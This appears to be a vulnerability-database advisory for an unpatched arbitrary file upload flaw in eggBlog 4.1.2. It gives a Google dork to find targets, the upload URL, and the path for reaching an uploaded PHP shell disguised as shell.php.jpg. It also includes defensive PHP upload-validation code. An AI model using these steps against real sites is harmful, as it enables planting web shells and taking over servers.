Vendor: eggBlog
By: Pokk3rs
CVSS: 8,8 HIGH
Arbitrary File Upload
CWE: 434
Product Name: eggBlog
Affected Version From: 4.1.2
Affected Version To: 4.1.2
Patch Exists: NO
Related CWE: N/A
CPE: eggblog:eggblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8 Pro x64
2013

eggBlog Arbitrary File Upload Vulnerability

An arbitrary file upload vulnerability exists in eggBlog, which allows an attacker to upload a malicious file to the server. By using the Google Dork “powered by eggBlog.net”, an attacker can find vulnerable websites. The attacker can then access the vulnerable URL http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= and upload a malicious file, such as a PHP shell, as a .jpg file. The malicious file can then be accessed at http://server/[path]/photos/uploads/shell.php.jpg.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions. Additionally, ensure that the application is configured to only allow the upload of files to a directory outside of the web root.
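One way to implement the mitigation above, shown as an added example (this is not eggBlog code or a vendor patch). It assumes PHP 7+ with the fileinfo extension; UPLOAD_DIR and both function names are hypothetical. It goes a little beyond a plain extension check by rejecting multi-extension names such as shell.php.jpg and comparing the detected content type against the extension.

```php
<?php
// Added example, not eggBlog code. UPLOAD_DIR is a hypothetical path outside the web root.
const UPLOAD_DIR = '/var/lib/app-uploads';
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png', 'gif' => 'image/gif'];

// Returns the single allow-listed extension of $name, or throws.
function validate_upload_name(string $name): string
{
    // Split on every dot: "shell.php.jpg" -> ["shell", "php", "jpg"].
    $parts = explode('.', strtolower(basename($name)));
    if (count($parts) !== 2 || $parts[0] === '') {
        throw new RuntimeException('name must have exactly one extension');
    }
    if (!array_key_exists($parts[1], ALLOWED)) {
        throw new RuntimeException('extension not on the allow-list');
    }
    return $parts[1];
}

// $file is one entry of $_FILES; returns the path the file was stored at.
function store_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    $ext = validate_upload_name($file['name']);
    // Detect the type from the bytes; the client-supplied $file['type'] is untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: the client's file name never reaches the disk.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// CLI demo of the name check on constructed file names.
if (PHP_SAPI === 'cli') {
    foreach (['photo.jpg', 'shell.php.jpg', 'shell.php', '.jpg'] as $name) {
        try {
            echo $name, ' => accepted as .', validate_upload_name($name), PHP_EOL;
        } catch (RuntimeException $e) {
            echo $name, ' => rejected: ', $e->getMessage(), PHP_EOL;
        }
    }
}
```

A content-type check alone does not stop an image that also carries script text, which is why the file is stored outside the web root under a server-chosen name.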

Exploit-DB raw data:

# Exploit Title: eggBlog Arbitrary File Upload Vulnerability
# Google Dork:"powered by eggBlog.net"
# Date: 28/04/2013
# Exploit Author: Pokk3rs
# Vendor Homepage: http://eggblog.net/
# Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/
# Tested on: Win8 Pro x64



Expl0itation


1 - Google Dork:"powered by eggBlog.net"


2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=


3 - http://server/[path]/photos/uploads/shell.php.jpg



#